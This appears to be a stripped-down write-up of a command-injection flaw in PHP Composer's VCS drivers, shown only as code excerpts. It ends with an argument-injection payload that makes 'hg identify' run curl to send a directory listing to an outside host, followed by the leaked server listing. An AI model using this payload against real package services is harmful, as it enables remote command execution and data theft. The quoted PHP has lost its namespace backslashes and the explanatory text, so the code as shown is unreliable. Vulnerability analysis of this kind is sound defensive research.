PHP Composer命令注入漏洞详情及利用方式

use SymfonyComponentProcessProcess;// [...]class ProcessExecutor{    // [...]    public function execute($command, &$output = null, $cwd = null){        if (func_num_args() > 1) {            return $this->doExecute($command, $cwd, false, $output);        }        return $this->doExecute($command, $cwd, false);    }    // [...]    private function doExecute($command, $cwd, $tty, &$output = null){        // [...]        if (method_exists('SymfonyComponentProcessProcess', 'fromShellCommandline')) {            // [1]            $process = Process::fromShellCommandline($command, $cwd, null, null, static::getTimeout());        } else {            // [2]            $process = new Process($command, $cwd, null, null, static::getTimeout());        }        if (!Platform::isWindows() && $tty) {            try {                $process->setTty(true);            } catch (RuntimeException $e) {                // ignore TTY enabling errors            }        }        $callback = is_callable($output) ? $output : array($this, 'outputHandler');        $process->run($callback);

public static function supports(IOInterface $io, Config $config, $url, $deep = false){    if (preg_match('#(^git://|.git/?$|git(?:olite)?@|//git.|//github.com/)#i', $url)) {        return true;    }    // [...]    try {        $gitUtil->runCommand(function ($url) {            return 'git ls-remote --heads ' . ProcessExecutor::escape($url); // [1]        }, $url, sys_get_temp_dir());    } catch (RuntimeException $e) {        return false;    }

public static function supports(IOInterface $io, Config $config, $url, $deep = false){    $url = self::normalizeUrl($url);    if (preg_match('#(^svn://|^svn+ssh://|svn.)#i', $url)) {        return true;    }    // [...]    $process = new ProcessExecutor($io);    $exit = $process->execute(        "svn info --non-interactive ".ProcessExecutor::escape($url),        $ignoredOutput    );

public static function supports(IOInterface $io, Config $config, $url, $deep = false){    if (preg_match('#(^(?:https?|ssh)://(?:[^@]+@)?bitbucket.org|https://(?:.*?).kilnhg.com)#i', $url)) {        return true;    }    // [...]    $process = new ProcessExecutor($io);    $exit = $process->execute(sprintf('hg identify %s', ProcessExecutor::escape($url)), $ignored);    return $exit === 0;}

$io = new NullIO();$config = Factory::createConfig();$io->loadConfiguration($config);$httpDownloader = new HttpDownloader($io, $config);$repository = new VcsRepository(['url' => $this->repository], $io, $config, $httpDownloader); // [1]$driver = $this->vcsDriver = $repository->getDriver(); // [2]if (!$driver) {    return;}$information = $driver->getComposerInformation($driver->getRootIdentifier());if (!isset($information['name'])) {    return;}if (null === $this->getName()) {    $this->setName(trim($information['name']));}

-config=alias.identify=!curl http://exfiltration-host.tld --data “$(ls -alh)”

total 120K drwxrwxr-x  9 composer composer 4.0K Apr 21 23:19 . dr-xr-xr-x 15 composer composer 4.0K Apr 20 07:38 .. -r--r--r--  1 composer composer 8.7K Apr 20 07:38 .htaccess -r--r--r--  1 composer composer 1.3K Apr 20 07:38 app.php -r--r--r--  1 composer composer 8.2K Apr 20 07:38 apple-touch-icon-precomposed.png -r--r--r--  1 composer composer 8.2K Apr 20 07:38 apple-touch-icon.png dr-xr-xr-x  3 composer composer 4.0K Jan 13 14:35 bundles dr-xr-xr-x  4 composer composer 4.0K Apr 20 07:38 css [...] lrwxrwxrwx  1 composer composer   15 Aug 13  2020 packages.json -> p/packages.json lrwxrwxrwx  1 composer composer   18 Aug 13  2020 packages.json.gz -> p/packages.json.gz -r--r--r--  1 composer composer  106 Apr 20 07:38 robots.txt -r--r--r--  1 composer composer  798 Apr 20 07:38 search.osd dr-xr-xr-x  2 composer composer 4.0K Apr 20 07:38 static-error -r--r--r--  1 composer composer 8.8K Apr 20 07:38 touch-icon-192x192.png